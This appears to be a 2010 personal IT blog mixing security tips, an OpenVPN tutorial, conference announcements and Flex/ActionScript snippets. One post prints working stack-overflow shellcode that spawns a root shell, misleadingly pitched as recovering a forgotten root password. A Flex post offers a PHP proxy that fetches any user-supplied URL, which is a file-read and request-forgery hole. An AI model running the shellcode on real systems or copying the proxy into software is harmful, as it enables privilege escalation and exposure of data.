My experience on my daily works... helping others ease each other

Sunday, November 28, 2010

World Computer Security Day 2010

This year theme is Managing Risk
53 ways to participate/observe the Computer Security Day

  1. Display computer security posters.
  2. Present computer security briefings.
  3. Change your password.
  4. Check for computer viruses.
  5. Show computer security videos, films or slides.
  6. Protect against static electricity.
  7. Modify the logon message on your computer system to notify users that Computer Security Day is November 30.
  8. Vacuum your computer and the immediate area.
  9. Clean the heads on your disk drives or other magnetic media drives.
  10. Back-up your data. (after being certain that it is virus-free.)
  11. Delete unneeded files.
  12. Initiate a computer security poster design contest for next year.
  13. Demonstrate computer security software.
  14. Publicize existing computer security policy.
  15. Issue new and improved computer security policy.
  16. Declare an amnesty day for computer security violators who wish to reform.
  17. Announce COMPUTER SECURITY DAY in your internal newsletter.
  18. Examine the audit files on your computers.
  19. Verify that the "Welcome" message that is normally used on your computer is appropriate for your organization.
  20. Write-protect all diskettes that are not to be written to.
  21. Take the write-protect rings out of the tapes in your library.
  22. Verify your inventory of computer applications.
  23. Verify your inventory of computer utilities and packaged software.
  24. Verify your inventory of computer hardware.
  25. Install and inspect power surge protection as appropriate.
  26. Install fire/smoke detection and suppression equipment in computer areas.
  27. Eliminate dust from computer areas, including chalk dust.
  28. Provide dust and water covers for personal and larger computers.
  29. Post "No Drinking" and "No Smoking" signs in computer areas.
  30. Develop a recovery plan for all computer systems that require one.
  31. Verify that passwords are not "Posted" and all other keys are secured.
  32. Verify that backup power and air conditioning fit your needs.
  33. Have a mini training session to provide all computer users with a basic understanding of computer security.
  34. Verify that all source code is protected from unauthorized changes.
  35. Verify that each computer has trouble log and that it is being used.
  36. Verify that appropriate off site storage exists and is being used.
  37. Remove all unnecessary items such as extra supplies, coat racks, and printouts from the computer room.
  38. Select a computer system on which to perform a risk analysis.
  39. Begin planning for next year's COMPUTER SECURITY DAY.
  40. Change the FORMAT command in DOS to avoid accidentally FORMATing of disks.
  41. Protect the computer on your store-and-forward phone message system.
  42. Hold a discussion of ethics with computer users.
  43. Volunteer to speak about computer security at a local computer club or school.
  44. Collect Computer Security Day memorabilia to trade with others.
  45. Register and pay for all commercial software that is used on your computer.
  46. Register and pay for all shareware that you use regularly.
  47. Install all security-related updates to your computer's operating system.
  48. Help a computer novice backup their files.
  49. Protect all cabin computers from floating droplets of liquid.
  50. Plan to attend a computer security meeting or seminar.
  51. Consider the privacy aspect of the data on your computer and protect it.
  52. Update your anti-virus program
  53. Add to this list – things that you believe would benefit all advocates of computer security
Share:

Wednesday, November 24, 2010

How to verified email address? A way to prevent scam, spam, etc

How to Verify an Email Address?

How do you verify if a given email address is real or fake? Well an obvious solution is that you send a test mail to that email address and if your message doesn’t bounce, it is safe to assume* that the address is real.


[*] Some web domains may have configured a catch-all email address meaning that messages addressed to a non-existent mailbox will not be returned to the sender but in most cases, such email messages will bounce.

So how can we verify that:
Check here were the author (Amit Agarwal) show how to verify the email...
1. http://www.labnol.org/software/verify-email-address/18220/
2. http://lifehacker.com/5697360/how-to-verify-if-an-email-address-is-real-or-fake
Share:

Saturday, November 20, 2010

Bing Bar Causing IE failed to close

I did install Microsoft bing bar to allow me to access Microsoft search capability and others tools in IE. It works fine for quite sometimes. However, last few days, I was unable to close the IE. I did end the process at Task Manager and do lots of things as suggested (check for malware, adware, spyware, etc) but nothing could solve the problem.

Then I found one process running whenever I open up IE. It is the bing bar process. When I end the process, disable the bing bar, my IE no longer have issue to close it down. I believe there is some loop-holes in the bar being utilized to compromise the computer.

So, if any of you had the same problem (unable to terminate IE), remove your bing bar and it should work again.
Share:

Friday, November 19, 2010

WiTopia - Is it safe?

I read a recent articles on protecting yourself from firesheep (a mozilla plugin that meant for good but becoming as a tool for hackers). Read the articles here.

The author that link the articles to another articles he wrote at blog.techrepublic.Here he explains on how WiTopia could provide a secure tunnel between the client and the server that the client wish to connect to or communicate with.

However, the author do forget something here. TRUST between both parties. The question here is CAN WE TRUST WiTopia to keep all our confidential information, such as username and password? Compare to RIM which provide such services for their blackberry phones whereby all information from the devices (email, etc) were stored in their server located in Canada (and few other places). There was great concern on their security and trustworthiness and few countries has requested that the server shall be allocated at their country rather than outside.

So can we trust WiTopia to keep our secret? Is WiTopia safe from being attack or hack? How can we ensure that? Since WiTopia will decrypt our request, relay to the requested site/server, get the response, and relay back in encrypted format to us. It may be secure between client and WiTopia server, but beyond that is no longer secure. That in terms of Trust.

What about Privacy? Shall we trust the service provider with all our privacy data being decrypted and can be seen in the server? How WiTopia protect our secrecy and privacy? Will there be possibility of leakage or it is fully protected even the WiTopia developers or system administrator don't know what is happening (which is impossible for him if in the event he need to do some tracing or maintenance or bugs fixing)?

This are great concern before you proceed with the advice of the author. I'm not saying that using WiTopia is not helping you securing yourself from using wireless devices, but please do get the information on how WiTopia works completely before making such decision.
Share:

Browser contains serious bugs

Chrome, Safari, Office top list for serious bugs



Chrome was the application with the most number of high-severity vulnerabilities that impacted end users this year, followed by Safari, Microsoft Office, Adobe Reader and Acrobat, and Firefox, according to a list to be released today.

Chrome had 76 reported serious vulnerabilities, Safari had 60, Office had 57, Acrobat and Reader had 54, and Firefox had 51, according to Bit9's annual "Dirty Dozen" list.

The fact that Chrome is at the top of the list does not necessarily mean it is less secure than other applications, said Harry Sverdlove, chief technology officer at Bit9.

"Chrome is the youngest of the browsers out there and is going through the most changes," he said. "It doesn't mean it's a risky browser."

Rounding out the list were: Sun Java Development Kit (36 reported holes), Adobe Shockwave Player (35), Microsoft Internet Explorer (32), RealNetworks RealPlayer (14), Apple Webkit (9), Adobe Flash Player (8), while Apple QuickTime and Opera were tied in last place with 6 vulnerabilities each.

Apple appears on the list three times, "which dispels the myth that Apple is safer" than Windows, Sverdlove said. "They are as vulnerable, if not more so, as Microsoft Windows."
The applications were pulled from the U.S. National Institute of Standards and Technology's official vulnerability database. They all had a severity rating of high.

The method of just focusing on the number of reported vulnerabilities is not without controversy. As Mozilla pointed out two years ago, the Bit9 study ignores issues like how quickly the bugs are fixed, and it punishes companies like Google and Mozilla that publicly disclose all vulnerabilities while other companies disclose only publicly discovered holes and not those found internally. It also fails to recognize that some companies lump multiple vulnerabilities into one report in the vulnerability database. In addition, there have been concerns about the quality and presentation of data in the vulnerability databases themselves, as mentioned by Google earlier this year.

This article was first published as a blog post on CNET News and extracted from ZDNet Asia
Share:

Cambridge Brain Science

Test your brain how it works

http://cbstrials.com/Open/Default.aspx?B_ID=279
Share:

Wednesday, November 17, 2010

For good purpose but with bad implications

If you forgot your root password and wish to access it to change... They code below can be used :)
#include "string.h"
#include "stdio.h"
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];

int main(int argc, char **argv){
char buffer[96];
int i;

long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < (int) strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer, large_string);

return 0;
}
HOWEVER... it is strictly for your own purposes ONLY. It shall not be used as hacking tool.
Use VM to test it out :) 

to test:
$ gcc bof.c
$ su
Password:
# chown root.root a.out
# chmod u+s a.out
$ whoami
YourName
$ ./a.out
$ whoami
root



You know gain root shell access and can execute anything as root rights... Scary ya...
Share:

Friday, November 12, 2010

Looking for tool to derive AST from Source Code

I'm looking for a program (or source code written either using java or C language) which be able to take source-code (single or multiple file) and establish AST (abstract syntax tree), PDG (Program Dependency Graph), and CFG (Control Flow Graph).

I've been searching quite sometime but has yet to found any. Most of the tool I found take executable or binary files likes CodeSonar/x86 and IDAPro which does not suite my research.

If any of you know about it, please share the information with me.

Really thankful for all help given :)
Share:

Tips & Trick for setting up OpenVPN

Having a virtual private network affords a lot of convenience, particularly for those who want or need to access a remote network from a different location, such as connecting to a work network from home, or vice versa. With the availability of 3G on the road, or wireless hotspots everywhere, being able to connect, securely, to a remote private network from anywhere is ideal.

OpenVPN is one of the most reliable VPN setups around. It's fully open source, it's supported on Linux, Windows, and OS X, it's robust, and it's secure. Unfortunately, configuration can be a bit of a pain, so in a series of upcoming tips, I aim to get you up and running quickly.
To begin, you will need to have OpenVPN installed on the server or system you wish to use as a VPN end-point. Most distributions include OpenVPN; for the server setup, I am using OpenVPN 2.0.9 as provided by the RPMForge repository for CentOS 5.

The first part of this series concentrates on the server, while the second and third parts will concentrate on the configuration of Linux and OS X clients, respectively. So without further ado, let's get our hands dirty.
To begin with, you need to copy some files from the OpenVPN docs directory (typically provided in /usr/share/doc/openvpn-[version]) to create certificates:
# cd /usr/share/doc/openvpn-2.0.9
# cp -av easy-rsa /etc/openvpn/
# cd /etc/openvpn/easy-rsa/
# vim vars

In the vars file, edit the KEY_* entries at the bottom of the file, such as KEY_COUNTRY, KEY_ORG, KEY_EMAIL, etc. These will be used to build the OpenSSL certificates. Next, it's time to initialize the PKI:
# . ./vars
# sh clean-all
# sh build-ca
# sh build-key-server server

For the above, and the below client certificates, you can enter pretty much anything for the "Common Name" field, however there is a certain logic to use: "OpenVPN-CA" when generating the Certificate Authority, "server" when generating the server certificate, and "client" or the name of the specific client system for the client certificates. Those certificates are generated with:
# sh build-key client1
# sh build-key client2

The next step is to generate the Diffie Hellman parameters for the server:
# sh build-dh

When this is done, you will have a number of files in the keys/ subdirectory. At this point, for the clients, you want to copy the appropriate files to them securely (i.e., via SSH or on a USB stick); the files the clients need are ca.crt, client1.crt, and client1.key (or whatever you named the files when you generated them with the build-key script).

Next, create the OpenVPN server configuration file. To get up and running quickly, copy one of the example config files:
# cd /etc/openvpn/
# cp /usr/share/doc/openvpn-2.0.9/sample-config-files/server.conf .
# vim server.conf

The aim here is to get this going right away, so we won't examine each of the options in detail. The primary things you want to do are to uncomment the "user" and "group" directives, to make the openvpn process run as the unprivileged "nobody" user. You may also want to change the "local" directive to make it listen to one specific IP address. This would be the IP to which your firewall is forwarding UDP port 1194. As well, you will want to set the "client-to-client" directive to enable it, and also set the "push" directives for route and DNS options. What follows is a comment-stripped server.conf, as an example:
local 192.168.10.11
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key  # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "route 192.168.10.0 255.255.254.0"
push "dhcp-option DNS 192.168.10.12"
push "dhcp-option DOMAIN domain.com"
client-to-client
keepalive 10 120
comp-lzo
user nobody
group nobody
persist-key
persist-tun
status openvpn-status.log
verb 3

Finally, copy the required keys and certificates that you previously generated:
# cd  /etc/openvpn/
# cp easy-rsa/keys/ca.crt .
# cp easy-rsa/keys/server.{key,crt} .
# cp easy-rsa/keys/dh1024.pem  .

And, finally, start the OpenVPN server:
# /etc/init.d/openvpn start

To get routing set up properly on the server so that remote clients, when they connect, can reach more than just the server itself, you will need to enable IP forwarding. This can be done by the following:
# echo 1 > /proc/sys/net/ipv4/ip_forward

You can also do it by editing /etc/sysctl.conf and adding the following (this is a good thing to do as it will ensure that packet-forwarding persists across reboots):
net.ipv4.ip_forward = 1

You also want to ensure that packets going back to the client system are routed properly. This can be done by changing the route on the gateway of the server's network to route packets to the client network (10.8.0.1/32) through the OpenVPN server (if the server happens to be the gateway as well, you don't have to do anything additional to accomplish this). How this is done largely depends on the operating system of the gateway.

Once this is done, you should be able to ping any machine on the server's LAN from the client, and be able to ping the client from any machine on the server's LAN. For instance, from a machine on the server LAN (not the server):
% traceroute 10.8.0.6
traceroute to 10.8.0.6 (10.8.0.6), 64 hops max, 52 byte packets
1  fw (192.168.10.1)  0.848 ms  0.342 ms  0.249 ms
2  server (192.168.10.11)  0.214 ms  0.231 ms  0.243 ms
3  server (192.168.10.11)  0.199 ms !Z  0.443 ms !Z  0.396 ms !Z
% ping 10.8.0.6
PING 10.8.0.6 (10.8.0.6): 56 data bytes
64 bytes from 10.8.0.6: icmp_seq=0 ttl=63 time=17.540 ms

And from the client:
# traceroute 192.168.10.65
traceroute to 192.168.10.65 (192.168.10.65), 30 hops max, 40 byte packets
1  10.8.0.1 (10.8.0.1)  22.963 ms  27.311 ms  27.317 ms
2  10.8.0.1 (10.8.0.1)  27.297 ms !X  27.294 ms !X  27.269 ms !X
# ping 192.168.10.65
PING 192.168.10.65 (192.168.10.65) 56(84) bytes of data.
64 bytes from 192.168.10.65: icmp_seq=1 ttl=62 time=515 ms

The setting up of OpenVPN clients will be the subject of two tips in the next week. I've made the assumption that the client is correctly configured here, simply to illustrate how it should look when it all works together, but in the next parts of this series we will get into more depth with the client configuration.

The tips was taken from ZD NET ASIA shared by Vincent Danen (Red Hat Security Response Team)
Share:

Thursday, November 11, 2010

ALMUC 2010 Penang

Almuc 2010 Penang

ALMUC 2010 Penang is organized by myVSTS, a charter established in TechNation. myVSTS is a community group of Visual Studio users focused on Application Lifecycle Management. ALMUC 2010 Penang is one of the most remarkable events that bring together organizations from various sectors including governmental, non-governmental, private, international and bilateral organizations under one roof, thereby serving as the platform to share knowledge and experience of Visual Studio from the industry experts such as Microsoft Most Valuable Professional awardees.
Date: 1 December 2010
Time: 9:00am - 5:30pm
Venue: 1, Jalan Sultan Azlan Shah, Bandar Bayan Baru, Bayan Lepas, Penang.
Share:

Free E Book

Free eBook: Moving to Microsoft Visual Studio 2010

Still using Visual Studio 2008? Oops, you said 2005? Maybe 2003? We're pleased to announce another free offering from Microsoft Press (336 pages).
Share:

JCIT & JDCTA (Journal)

JCIT & JDCTA(EI cited): : Call for Papers and Special (Invited) Issues
JDCTA:
http://www.aicit.org/jdcta
JCIT:
http://www.aicit.org/jcit

Citation
: EI, INSPEC, DBLP, Google Scholar, DOI, Computer and Information Systems Abstracts


It is our pleasure to invite you to submit Papers, Invited (Special) Issue proposal to JCIT & JDCTA.


ISSN : 1975-9320


http://www.aicit.org/jcit

(Since 2006)





Citation
: EI, INSPEC, DBLP, Google Scholar, DOI, Computer and Information Systems Abstracts

Call for Papers and Special Issues

JCIT focuses on the theories/technologies/architecture and its applications on the various aspects of advances in convergence and hybrid Information Technology. JCIT always welcomes excellent papers on the traditional and convergence areas of information technologies and next generation information technologies.


SCOPE

JCIT
invites new and original submissions addressing theoretical and practical topics and its applications in convergence/hybrid information technology and next generation information technologies fields including (but not limited to these topics):

Topic 1: IT-based Convergence Technology and Service
Topic 2: HCI & Bioinformatics
Topic 3: Ubiquitous Computing
Topic 4: Business and Information Systems
Topic 5: Social and Business Aspects of Convergence IT and Ubiquitous Computing


Editorials and Details

For more details, see the web site:
http://www.aicit.org/jcit

ISSN : 1975-9339


http://www.aicit.org/jdcta

(Since 2007)







Citation
: EI, INSPEC, DBLP, Google Scholar, DOI, Computer and Information Systems Abstracts

Call for Papers and Special Issues

JDCTA is a refereed, multidisciplinary journal for bridging the latest advances in the digital content technologies and its applications. It provides an international forum for presenting authoritative references, academically rigorous research, and case studies.


Scope

The Journal JDCTA focuses on the theories/technologies/architecture and its applications on the various aspects of advances in the digital content technologies. JDCTA shall always welcome all research results on the traditional and hybrid areas of the digital content technologies and its applications(
but not limited to these topics).

Topic 1: Hybrid and Convergence IT and Service: Technology, Content, Service and its Applications
Topic 2: Digital Content: Technologies, Content, Design, Services and its Applications
Topic 3: HCI /Health/Bioinformatics relevant to Information Technology
Topic
4: Ubiquitous Computing: Content, Technology, Service and its Applications


Editorials and Details

For more details, see the web site:
http://www.aicit.org/jdcta

Share:

The 3rd Conference on Data Mining and Optimization

DMO’11: The 3rd Conference on Data Mining and Optimization
28 & 29 June 2011, Putrajaya, Malaysia

http://dmo.ukm.my/dmo11/
[Technical Co-sponsors: IEEE & IEEE Computer Society]

======================================

 
We would like to invite you and you colleagues to participate and present a research article at the 3rd Conference on Data Mining and Optimization.

 
The 3rd Conference on Data Mining and Optimization, or DMO’11, is a congregation of the top minds conducting theoretic, experimental, and professional research and applications in the fields of Data Mining and Optimization.  The combination of data mining and optimization provides the focus of discovering the best or most useful embedded information from large datasets, potentially providing strategic advantages in decision-making to practitioners of these two techniques.  Our aim is to bring together researchers, practitioners, and students who are conducting work in any of the sub-topics within these two areas, in an atmosphere of scientific discussion for a dynamic exchange of ideas regarding their latest results and advances in these two fields.
 
DMO’11 is organized by the Data Mining and Optimization Research Group, and sponsored by Universiti Kebangsaan Malaysia. The Technical Co-Sponsors for the conference are IEEE Malaysia Section and IEEE Computer Society Malaysia.  For further information regarding DMO’11 and the Data Mining and Optimization Research Group of UKM, visit:

http://dmo.ukm.my/dmo11/
 
DMO’11 is held in conjunction with M-CAIT’2011: The 1st International Multi-Conference on Artificial Intelligence Technology.  For more information regarding the M-CAIT’2011 multi-conference and all other sister conferences held at M-CAIT’2011, visit:

http://www.ftsm.ukm.my:8080/mcait2011/
 
------------------

TOPICS OF INTEREST

------------------

DATA & TEXT MINING:

* Data & text mining Tasks such as classification, estimation, prediction, clustering, association rules mining, deviation detection, similarity analysis, etc.

* Data & text mining Techniques such as neural networks, genetic algorithm, statistical analysis, artificial immune system and other soft computing techniques.

* Data & text Mining Applications in Medical, Healthcare, Electronic Commerce, Bioinformatics, Computer Security, Web Intelligence, Intelligent Learning Database Systems, Finance, Marketing, Healthcare, Telecommunications, and other fields.

* Optimization Techniques for Data & text mining.

 
OPTIMIZATION:

* Algorithms: Local Search, Meta-heuristic search, Heuristic Search, Evolutionary Algorithms, Constraint Logic Programming, Automated Reasoning.

* Applications: Shop-floor scheduling, Sport scheduling, Timetabling, Vehicle routing, Transport scheduling, Machine scheduling, Rostering.

 
----------------------

SUBMISSION INFORMATION

----------------------

You are invited to submit:

* A full paper (4 to 7 pages) for publication and oral presentation, or

* A short paper (less than 4 pages) for poster presentation, or

* A proposal to organize a technical session and/or workshop.

Selected articles will also be invited for publication in the International Journal of Advances in Soft Computing and Its Applications (IJASCA).  Visit the DMO’11 conference website for more details.

 
Please submit all papers and proposals through any of the following methods:

E-MAIL SUBMISSION:  dmo2011@ftsm.ukm.my

WEB SUBMISSION:  
http://dmo.ukm.my/dmo11/
All papers should be submitted in PDF format (A4 paper size), using the IEEE Conference Proceeding template:

http://www.ieee.org/conferences_events/conferences/publishing/templates.html
 
---------------

IMPORTANT DATES

---------------

Full Paper Submission:  2 January 2011

Paper Rejection/Acceptance Notification:  30 March 2011

Camera Ready Submission:  15 April 2011

Early bird Registration:  Until 1 April 2011

Normal Registration:  Starting 2 April 2011

Conference:  28 & 29 June 2011

 
----------------

SPECIAL SESSIONS

----------------

A special session on “DYNAMIC OPTIMIZATION” will be held as part of the DMO’11 conference.  This special session is organized by A. Hajjam And J.-C. Creput of Université de Technologie de Belfort-Montbéliard (UTBM), France.  You are invited to e-mail the organizers of the special session directly for further details:

amir.hajjam@utbm.fr

jean-charles.creput@utbm.fr

 
----------

CONTACT US

----------

Further details regarding DMO’11 can be obtained at the conference website below, or by contacting the Conference Co-Chair, Dr Masri Ayob, directly:

WEBSITE:  
http://dmo.ukm.my/dmo11/
E-MAIL:  dmo2011@ftsm.ukm.my

FAX:  +60389216184

 
POSTAL ADDRESS:

 
DMO’11 Secretariat

(Attn: Dr Masri Ayob)

Data Mining & Optimization Research Group

Faculty of Information Science and Technology

Universiti Kebangsaan Malaysia

43600 UKM Bangi

Selangor

MALAYSIA

Share:

2011 Information Technologies, Management and Digital World (NCM series)

2011 International Conferences in Korea(May Conferences)

2011 Information Technologies, Management and Digital World (NCM series)

Call for Program Committee Members/Workshops/Invited
Sessions/Chairs/Papers
- Dates and Venue: May 11-13, 2011, Hilton Hotel Gyeongju, Gyeongju, Korea

  • NCM2011:
7th International Conference on Networked Computing and Advanced Information Management, http://www.aicit.org/ncm
  • IDC2011:
7th International Conference on Digital Content, Multimedia Technology and its Applications, http://www.aicit.org/idc
  • INC2011:
7th International Conference on Networked Computing,
http://www.aicit.org/inc
  • IMS2011:
7th International Conference on Advanced Information Management and Service, http://www.aicit.org/ims11



Call for Chairs

We courteously invite some eminent professor/scholar/engineer as a General Chair, Program Chair, Organization Chair, Local Chair, Publication Chair, Publicity Chair, Technical Council Chair, Honorary Chair, Advisory Board.

Invitation to the member of International Program/Research Committee

We courteously invite professor/scholar/engineer as a member of International Program/Research Committee in premium and world-class international conferences organized by AICIT.

Call for Invited Sessions

Following the tradition, NCM series invited sessions will provide participants with opportunities to discuss and explore emerging areas of Networked Computing Management and Advanced Information Management with fellow students, researchers, and practitioners in special areas.

Call for Workshops

NCM series workshops will provide the participants with opportunities to discuss and explore areas related to the Theory, Development, Applications, Experiences, and Evaluation of Networked/Ubiquitous Computing and Advanced Information Management with fellow students, researchers, and practitioners. Workshops may be related to any topics within the conference scope.

Call for Papers

NCM series will be held in Gyeongju, Republic of Korea. Selected papers will be included as revised monographs in the international journals. For more details, visit the conference web. This premium international conference provides a forum to present research results in all areas related to Theory, Development, Applications, Experiences, and Evaluation of Networked/Ubiquitous Computing and Advanced Information Management.
-
http://www.aicit.org/ncm
-
http://www.aicit.org/idc
-
http://www.aicit.org/inc
-
http://www.aicit.org/ims11
Share:

International Conference on Mathematical and Computational Biology 2011 (ICMCB 2011)

We are pleased to inform that the Institute for Mathematical Research, Universiti Putra Malaysia will be organizing the International Conference on Mathematical and Computational Biology 2011 (ICMCB 2011). The conference will be held on:

Date       : 12 – 14 April 2011
Venue    : Renaissance Hotel, MalaccaMalaysia

We would like to invite you to participate and help publicize this conference to the members of your department or institute and other interested parties. The conference details and online registration can be found at http://einspem.upm.edu.my/icmcb2011

Many thanks in advance for your cooperation and support.

Regards,
Secretariat
ICMCB 2011
Share:

Tuesday, November 9, 2010

Cloud Computing World Forum Asia 2010







 
 

Get access to the full conference, expo 
and networking area, a copy of the conference material.
Email your details
 
to Francesca@keynoteworld.com 
to reserve your place now

 Show Highlights Include:

  • 2 day conference and expo on Cloud Computing and SaaS
  • Free to attend expo with seminar and scenario zone - click here to register
  • Hear from leading case studies on how they have integrated Cloud Computing and SaaS into their working practices
  • Learn from the key players offering cloud and SaaS products and services
  • Benefit from our pre-show online meeting planner
  • Free Amazon Web Services credits to all attendees
  • Network in our combined expo and catering area
  • Evening networking gathering for all attendees
 

Hear from the leading suppliers, integrators and end-users to give you the
complete picture on Cloud Computing and SaaS

Key Speakers Include:
 


 Simone Brunozzi, Technology Evangelist, Amazon Web Services
Jeremy Godfrey,
CIO,
Hong Kong Government

Richard Achee,
Head of APAC Sales,
Google
 


Man Group
Ron Baillie,
Head of Strategy, Planning and Infrastructure,
Cathay Pacific 

Steven Yau,
CIO,
Walmart China

  Michael Zhu,
CIO,
Jinling Hotels and Resorts









Mark Beaumont,
Director,
Verizon Business

Susanna Shen, Head of Information Technology,
The Hong Kong and China Gas Company 

Ian Saggers,
Global Head of Infrastructure,
Man Group  





 

Keith Lam,
Systems Manager,
MTR Corporation

Terry Ho, Head of
Common Services, IT,
BNP Paribas

 Dr Paul Liu, Manager, Information Technology Division, Chong Hong Bank






Download a copy of the Event Brochure - Click Here

To reserve your place please visit www.cloudcomputinglive.com/asia 
or call +44 (0) 845 519 1230.

We look forward to seeing you at the show!



For more detail ... please visit EC-Council Website

EC-Council | 6330 Riverside Plaza Ln NW | Suite 210 | Albuquerque | NM | 87120
Share:

Reading file using AS3

Taken from http://snipplr.com/view/2937/reading-a-file-asynchronously-with-actionscript-3/
 // Imports
 import flash.filesystem.FileMode;
 import flash.filesystem.FileStream;
 import flash.filesystem.File;
 import flash.events.ProgressEvent;
 import flash.events.Event;

 // Declare the FileStream and String variables
     private var _fileStream:FileStream;

     private var _fileContents:String;

     private function onCreationComplete():void // Fired when the application has been created
      {
    var myFile:File = File.appResourceDirectory;
    // Create out file object and tell our File Object where to look for the file

    myFile = myFile.resolve("mySampleFile.txt"); // Point it to an actual file

          _fileStream = new FileStream(); // Create our file stream

          // Add our the progress event listener
          _fileStream.addEventListener(ProgressEvent.PROGRESS, onFileProgress);

         // Add our the complete event listener
         _fileStream.addEventListener(Event.COMPLETE, onFileComplete);
 
        // Call the openAsync() method instead of open()
        _fileStream.openAsync(myFile, FileMode.READ);
      }

      // Event handler for the PROGRESS Event
      private function onFileProgress(p_evt:ProgressEvent):void
      {

        // Read the contens of the file and add to the contents variable
       _fileContents += _fileStream.readMultiByte(_fileStream.bytesAvailable, "iso-8859-1");

       // Display the contents. I've created a TextArea on the stage for display
       fileContents_txt.text = _fileContents;
     
       }

      // Event handler for the COMPLETE event
      private function onFileComplete(p_evt:Event):void
      {

     _fileStream.close(); // Clean up and close the file stream

      }
Share:

Reading File in Flex


var loader:URLLoader = new URLLoader();
// telling the loader that we are dealing with variables here.

loader.dataFormat = URLLoaderDataFormat.VARIABLES;

// This is an eventlistener, these are used all the time in AS3
// learn to use them, this basically tells flash to listen to a specific event
// and then call a specific function.
// in Our case we listen for the even called COMPLETE which means it will active
// a function called "loading" when our flash movie has completed.
loader.addEventListener(Event.COMPLETE, loading);

// Here we tell our loading which file to extract from.
loader.load(new URLRequest("content.txt"));

// This is the function that will happen when the eventlistener activates.
// basiclly it says that our text fields called content_1 and _2's text property
// should be equal to loader.data.var_1 and var_2 (as you might remember from the explanation above).
function loading (event:Event):void {
content_1.text = loader.data.var_1
content_2.text = loader.data.var_2
}
Share:

Chart with Flex SDK

Taken from Charts with the Flex SDK

I do a lot of work in both Flex Builder and with the Flex Module for Apache. For anyone who has been trying to figure out how to move your Flex Charting components over to the Apache Module (or mxmlc compiler), here’s a quick tutorial.

Note that $FLEX_HOME is the location of your Flex SDK install. Mine, for example, is “C:\Program Files\Adobe\Flex 2″.

1. Copy your charts.swc file from $FLEX_BUILDER_HOME/Flex SDK 2/frameworks/libs to $FLEX_HOME/frameworks/libs.

2. Locate your license key from Flex Builder. You can find this on the menu bar under Help > Manage Flex Licenses…

3. Edit $FLEX_HOME/frameworks/license.properties and add the following line:

charting=

You can keep the dashes in the key. After that, restart your Apache instance and you’re good to go.
Share:

5 advice for developing RIA and WEB application in Flex

1. Avoid embed containers inside other containers. Reducing use of relative size and relative positionWhen the element size in container is described by percent, any change of the size or postion will take the re-position for all subset in container. The calculation will be great if the level of embed is deep.
2. Using lightweight containers like Canvas As far as possibleCanvas is the smallest container and only support absolutely positioin. Most time it could instead HBOx and VBox. Besides, Canvas is a first choice for us when custom containers. It has basic container function and good expand ability.
3. Avoid using large components like DataGrid, AdvancedDataGrid

Large components have powerful function but need high requirement for memory and CPU. Because of the complexity, it is difficult to realize the skin, patterns and itemRenderer.
4. Using paging when deal with data
When using data type control, as far as possible to minimze the amount of showing data. For example Tilelist, it will create all the data whether need or not. It will waste large resoures. When ViewStack 、TabNavigator, etc. dealing with element, data will not be created until they’re shown first time. The unnecessary cost will be avoided.
5. setStyle and styleName
In fact,the skin of Flex components is a visual element. In process of components initialization, they will use current style(for example:styleName) to finish all the skin elements.If we reset the style, the size of components by setStyle, the postion will also be adjusted. Link to the first point, if components in a deep level embed container will cost large calculation.


Taken from ntt
Share:

Using Flex HTTPServices to handle RSS feeds

If you are using HTTPService in flex or using flash actionscript to handle RSS feed, you might found that not all RSS feed is supported by flex. This is due to flex can only access any feeds that have cross-domain.xml in their root directory of the web-server.

What happen if the website supplying the feed don't have cross-domain.xml or limited to certain website to access it by defined rules in the xml files. How to handle that?

I found a way with the help of php.

As usual, in your flex applications, you will have this line of code:

showBusyCursor="true" method="GET" resultFormat="object" />



and somewhere in your code, you have it called
myHttpSvc.url = "";
myHttpSvc.send();

and you php should contains this line of code:
class rssfeed{
public function getRssFeed($urlAdd){
return file_get_contents( $urlAdd );
}
}

$sp = new rssfeed();
echo ($sp->getRssFeed(%_GET['urlToPass']));

That should do the trick. Now you can access any rss feed any feed into you flash / flex code without worrying about cross-domain.xml anymore.
Share:

Friday, November 5, 2010

OpenJDK


Share:

About Me

Somewhere, Selangor, Malaysia
An IT by profession, a beginner in photography

Blog Archive

Blogger templates